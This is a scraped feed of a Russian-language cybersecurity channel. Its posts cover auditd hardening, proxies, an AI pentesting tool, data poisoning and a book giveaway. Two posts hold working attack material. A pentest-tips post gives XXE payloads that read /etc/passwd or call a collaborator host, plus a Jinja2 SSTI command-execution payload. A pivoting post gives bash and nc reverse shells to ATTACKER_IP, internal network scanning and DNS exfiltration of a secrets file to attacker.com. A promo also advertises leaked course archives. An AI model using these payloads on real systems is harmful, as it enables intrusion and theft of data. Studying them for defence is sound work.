ZeroDay | Кибербезопасность

👁️В ИБ-сообществе набирают популярность 4 канала по кибербезу ИБ Книга — уже более 100 актуальных книг по кибербезу. no system is safe — бесплатный инструменты и курсы. CyberINS — авторский контент ИБешника. Бэкап — канал с исходниками популярных проектов. Весь материал на каналах в общем доступе.…

👁️В ИБ-сообществе набирают популярность 4 канала по кибербезу ИБ Книга — уже более 100 актуальных книг по кибербезу. no system is safe — бесплатный инструменты и курсы. CyberINS — авторский контент ИБешника. Бэкап — канал с исходниками популярных проектов. Весь материал на каналах в общем доступе. Ничего лишнего.

Аудит действий на Linux: настройка auditd​​​​​​​​​​​​​​​​ 👋 Приветствую в мире цифровой безопасности! Разберём, как настроить auditd - системный аудит на Linux, который пишет кто, что и когда делал на сервере. ⏺Устанавливаем и запускаем: apt install auditd audispd-plugins systemctl enable --now …

Аудит действий на Linux: настройка auditd​​​​​​​​​​​​​​​​ 👋 Приветствую в мире цифровой безопасности! Разберём, как настроить auditd - системный аудит на Linux, который пишет кто, что и когда делал на сервере. ⏺Устанавливаем и запускаем: apt install auditd audispd-plugins systemctl enable --now auditd ⏺Добавляем правила через auditctl: следим за изменениями в критичных файлах. auditctl -w /etc/passwd -p wa -k passwd_changes auditctl -w /etc/sudoers -p wa -k sudoers_changes auditctl -w /var/log/auth.log -p ra -k auth_log_read -p wa — write и attribute change. -k — метка для поиска в логах. ⏺Следим за выполнением подозрительных команд: auditctl -a always,exit -F arch=b64 -S execve -F uid=0 -k root_commands Каждая команда от root пишется в лог с полным контекстом: PID, UID, аргументы, рабочая директория. ⏺Делаем правила постоянными через /etc/audit/rules.d/: echo "-w /etc/passwd -p wa -k passwd_changes" >> /etc/audit/rules.d/hardening.rules augenrules --load ⏺Читаем логи через ausearch: ausearch -k passwd_changes -i # события по метке ausearch -k root_commands -i --start today aureport --auth # сводка по авторизациям Флаг -i переводит UID и syscall-номера в читаемый вид, без него лог выглядит как hex-помойка. ⏺auditd пишет до того, как syslog успевает что-то потерять. При инциденте это разница между «непонятно что произошло» и точным таймлайном действий атакующего. #wireguard

Лови список полезных IT каналов в Max 🇷🇺 Архиватор – крупная база слитых айти курсов по программированию Сливакер – отобранный архив полезных курсов для программистов Полка Разработчика – сборник книг для изучения Python, JS, Java и других языков программирования; Записки Фронтендера -- опытный …

Лови список полезных IT каналов в Max 🇷🇺 Архиватор – крупная база слитых айти курсов по программированию Сливакер – отобранный архив полезных курсов для программистов Полка Разработчика – сборник книг для изучения Python, JS, Java и других языков программирования; Записки Фронтендера -- опытный Frontend-разработчик собрал все самое основное Записки Бэкендера -- а тут опытный Backend-разработчик подбирает самое полезное Записки Питониста -- здесь думаю итак понятно, питонисты заходите Code Learning – ютуб в мире программистов, сборник видео для обучения Графика и Дизайн – сборник полезных курсов и видео для полного погружения в дизайн Нейролента – публикуем самое актуальное из мира нейросетей Windows Community -- все что связанно с Windows DevHumor – все что выше, без юмора не понять Находки Программиста – подбираем все самое нужно для программистов

🏁 КОНКУРС ЗАВЕРШЁН! 📌 розыгрыш книг ⚡️Разыгрываем книги по операционным системам (в бумажном варианте): — Linux глазами хакера (https://bhv.ru/product/linux-glazami-hakera-7-e-izdanie/) — Windows глазами хакера (https://bhv.ru/product/windows-glazami-hakera/) • Всего будет 4 призовых мест, а п…

🏁 КОНКУРС ЗАВЕРШЁН! 📌 розыгрыш книг ⚡️Разыгрываем книги по операционным системам (в бумажном варианте): — Linux глазами хакера (https://bhv.ru/product/linux-glazami-hakera-7-e-izdanie/) — Windows глазами хакера (https://bhv.ru/product/windows-glazami-hakera/) • Всего будет 4 призовых мест, а победители смогут выбрать любую понравившуюся книгу из списка выше. Итоги подведем ровно через неделю (9.04 в 19:00) при помощи бота который рандомно выберет победителя. Для участия нужно: 1. Подписаться на наши каналы в максе https://max.ru/cybersec_academy и https://max.ru/school_network 2. Нажать на кнопку «Участвовать» на посте в максе. 🏆 Победители: Андрей Ионов, Александр, Андрей, Soft LTD 🎉 Поздравляем! 🔒 Проверить честность

3 лайфхака для пентестинга 👋 `Приветствую в мире цифровой безопасности! Расскажу ещё о трех полезных фишках про пентесте.` ⏺XXE - когда XML-парсер работает против вас: Если приложение принимает XML и не отключило внешние сущности, парсер можно заставить читать локальные файлы сервера или делать з…

3 лайфхака для пентестинга 👋 `Приветствую в мире цифровой безопасности! Расскажу ещё о трех полезных фишках про пентесте.` ⏺XXE - когда XML-парсер работает против вас: Если приложение принимает XML и не отключило внешние сущности, парсер можно заставить читать локальные файлы сервера или делать запросы во внутреннюю сеть. Базовый пейлоад для чтения /etc/passwd: <?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <data>&xxe;</data> Для слепого XXE через out-of-band канал: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://your-collaborator.com/xxe">]> Встречается в загрузчиках документов, SOAP-сервисах и везде, где фронтенд конвертирует данные в XML перед отправкой. ⏺SSTI - шаблонизатор как точка входа: Server-Side Template Injection возникает, когда пользовательский ввод попадает напрямую в шаблон. Движки Jinja2, Twig, Freemarker выполняют это как код. Универсальный детект: {{7*7}} ${7*7} #{7*7} <%= 7*7 %> Если в ответе появился 49, движок обрабатывает ввод. Дальше RCE зависит от конкретного шаблонизатора. Для Jinja2: {{config.__class__.__init__.__globals__['os'].popen('id').read()}} Чаще всего встречается в письмах с персонализацией, страницах ошибок и полях с превью. ⏺Race Condition - состояние гонки в бизнес-логике: Два запроса уходят одновременно, сервер обрабатывает их параллельно до того, как успевает обновить состояние. Классический кейс - использовать промокод дважды или списать баланс ниже нуля. Через Burp Repeater группируем запросы и отправляем параллельно. Или через turbo intruder: engine.queue(target.req, gate='race1') engine.openGate('race1') Zeroday - https://max.ru/cybersec_academy

Прокси-сервер: кто на самом деле ходит в сеть вместо тебя 👋 Приветствую в мире цифровой безопасности! ⏺Прокси - это узел между тобой и сервером, через который проходит весь трафик. Ты отправляешь запрос не напрямую, а сначала в прокси, и уже он идёт дальше. В итоге для сайта именно прокси выглядит …

Прокси-сервер: кто на самом деле ходит в сеть вместо тебя 👋 Приветствую в мире цифровой безопасности! ⏺Прокси - это узел между тобой и сервером, через который проходит весь трафик. Ты отправляешь запрос не напрямую, а сначала в прокси, и уже он идёт дальше. В итоге для сайта именно прокси выглядит как реальный клиент. ⏺Из-за этого он может менять почти всё по пути: IP, заголовки, cookies, иногда даже тело запроса. То, что уходит наружу, не обязано совпадать с тем, что отправил клиент. ⏺Есть два основных сценария: Forward-прокси ставится со стороны клиента и контролирует исходящий трафик. Reverse-прокси стоит перед сервером, принимает весь входящий поток, балансирует нагрузку и скрывает внутреннюю структуру приложения. ⏺По уровню различия заметны сразу. HTTP-прокси «понимает», что именно передаётся, и может вмешиваться в запросы. SOCKS ничего не анализирует и просто прокидывает трафик, за счёт этого работает с любыми протоколами. ⏺С HTTPS используется CONNECT. Прокси открывает соединение до нужного хоста, после чего внутри идёт зашифрованный поток. В обычной ситуации он видит только метаданные и не лезет внутрь. ⏺Но в реальных сетях часто делают иначе. Прокси разрывает TLS, подменяет сертификат и смотрит весь трафик уже в расшифрованном виде. Это стандартная практика для контроля внутри компаний. ⏺Через прокси удобно централизовать всё: логирование, фильтры, ограничения, кэш. Вся логика сходится в одной точке, через которую проходит поток. ⏺Если нужно сложнее, собирают цепочки прокси. Каждый узел знает только соседей, поэтому восстановить полный маршрут уже не так просто. ⏺В продакшене прокси закрывает кучу задач: защита backend, работа с API, контроль пользователей, обход ограничений на уровне приложений. ⏺С точки зрения безопасности это критическая точка. Ошибка в настройке или компрометация превращает прокси в точку полного контроля над трафиком. Zeroday - https://max.ru/cybersec_academy

Shannon Lite: AI-пентестер, который сам ломает твой код до продакшена 👋 Приветствую в мире цифровой безопасности! Поговорим о еще одном инструменте безопасности. ⏺Shannon Lite - автономный white-box AI-пентестер для веб-приложений и API. Он не просто ищет уязвимости по шаблонам, а читает твой исхо…

Shannon Lite: AI-пентестер, который сам ломает твой код до продакшена 👋 Приветствую в мире цифровой безопасности! Поговорим о еще одном инструменте безопасности. ⏺Shannon Lite - автономный white-box AI-пентестер для веб-приложений и API. Он не просто ищет уязвимости по шаблонам, а читает твой исходный код, находит точки атаки и сразу пытается их реально эксплуатировать. ⏺Ключевая идея простая: если эксплойта нет - уязвимости тоже «нет». В отчёт попадают только те проблемы, которые реально удалось воспроизвести. Никаких ложных срабатываний уровня «возможно XSS где-то тут». ⏺Работает как связка анализа кода и живой атаки. Сначала разбирает логику приложения, находит input → sink, потом через браузер и CLI атакует уже запущенное приложение. В ход идут XSS, SSRF, инъекции, обход аутентификации. ⏺Полностью автономный запуск. Один запуск - и он сам проходит логины, включая 2FA, обходит интерфейс, дергает API, ищет поверхность атаки и параллельно пытается ломать всё, что нашёл. ⏺Внутри не только AI. Использует классические инструменты разведки вроде nmap, subfinder, whatweb, но не как отдельные тулзы, а как часть пайплайна, где всё связано между собой. ⏺ Быстрый старт: npx @keygraph/shannon setup npx @keygraph/shannon start -u https://your-app.com -r /path/to/repo Под капотом поднимается Docker-контейнер и запускается полный пентест. ⏺ Можно указать конфиг с авторизацией, чтобы тестировать закрытые части authentication: login_url: "https://app.com/login" credentials: username: "test@example.com" password: "password" После этого AI сам проходит логин и тестирует уже авторизованную зону. ⏺Результат - это полноценный отчёт с PoC workspaces/.../deliverables/ └── comprehensive_security_assessment_report.md Там уже не теория, а готовые эксплойты, которые можно сразу проверить и отдать разработчикам. Zeroday - https://max.ru/cybersec_academy

Data Gravity и отравление выборки: как незаметно ломаются ML-системы Пока все спорят про архитектуры и модели, реальные проблемы обычно лежат ниже - в данных. Они накапливаются, расползаются по системам, обрастают костылями и в какой-то момент становятся настолько «тяжёлыми», что их уже нельзя ни н…

Data Gravity и отравление выборки: как незаметно ломаются ML-системы Пока все спорят про архитектуры и модели, реальные проблемы обычно лежат ниже - в данных. Они накапливаются, расползаются по системам, обрастают костылями и в какой-то момент становятся настолько «тяжёлыми», что их уже нельзя ни нормально собрать, ни проверить ⏺В статье говорят о том, как Data Gravity превращает инфраструктуру в зависимость от самих данных: десятки источников, копии без версий, ETL, который живёт своей жизнью. На этом фоне отравление выборки становится почти незаметным: можно подмешать шум, сдвинуть разметку или встроить триггер - и модель спокойно это выучит. Zeroday - https://max.ru/cybersec_academy

Smart news 💡 Актуальные новости из мира современных технологий и не только... Гаджеты, IT, ИИ, изобретения, космос, общество и многое другое. Присоединяйтесь 👍

Bash для пивотинга в сети 👋 Приветствую в мире цифровой безопасности! Попали на машину внутри сети. Дальше нужно двигаться, но инструментов нет. Разберём, что можно сделать чистым Bash. ⏺ Обратный shell без nc и socat: bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 Если наружу есть выход, этого дост…

Bash для пивотинга в сети 👋 Приветствую в мире цифровой безопасности! Попали на машину внутри сети. Дальше нужно двигаться, но инструментов нет. Разберём, что можно сделать чистым Bash. ⏺ Обратный shell без nc и socat: bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 Если наружу есть выход, этого достаточно, чтобы получить интерактивный доступ. Часто работает там, где всё остальное выпилено. ⏺ Проксируем трафик через FIFO, если нет нормального туннеля: mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP 4444 > /tmp/f Это уже ближе к «ручному сокету». Можно собрать канал там, где обычные методы ломаются. ⏺ Мини-портфорвардинг через Bash: while true; do nc -l -p 8080 -c 'nc internal_host 80'; done Если есть nc, можно быстро прокинуть доступ к внутреннему сервису через текущую машину. Примитивно, но работает. ⏺ Чтение внутренних сервисов напрямую через HTTP руками: exec 3<>/dev/tcp/127.0.0.1/8080 echo -e "GET / HTTP/1.1\r\nHost: localhost\r\n\r\n" >&3 cat <&3 Полезно, когда нет curl, но нужно быстро понять, что вообще отвечает на порту. ⏺ Динамическое сканирование подсетей через route: for net in $(ip route | awk '{print $1}'); do for ip in $(prips $net); do (echo >/dev/tcp/$ip/22) &>/dev/null && echo "$ip:22" done done Не просто /24, а всё, что реально доступно с этой машины. Иногда находятся неожиданные сегменты. ⏺ DNS как канал наружу: for i in $(cat secret.txt | xxd -p); do dig $i.attacker.com done Zeroday - https://max.ru/cybersec_academy